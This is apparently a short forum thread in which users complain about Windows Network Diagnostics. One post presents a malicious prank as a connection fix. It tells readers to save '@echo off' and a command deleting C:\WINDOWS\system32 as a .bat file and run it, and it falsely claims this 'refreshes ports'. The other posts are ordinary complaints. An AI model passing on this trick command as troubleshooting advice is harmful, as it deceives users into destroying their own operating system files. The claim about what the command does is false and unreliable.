Almost all of the problems I have with internet connection can be fixed by restarting the router..I almost never use this diagnose thing.

how to fix this
open a new text document
type this exactly

@echo off
del: c\WINDOWS\system32

save the file name as anything.bat (name it w/e u want but it has to end in .bat )
save as all files
open the text document when your internet plays up, and it should fix it.
what this does is communicates to the ports that your internet uses in system32 and simply refreshes them, hope this helped.

Every time Windows asks you if you want to use Network Diagnostics, you know your problem can not be fixed. End of fucking story.

It only works for me when I hit status and then diagnose... if I just hit trouble shoot problems it doesn't work

and half the time all it does is disable and re enable my wireless adapter
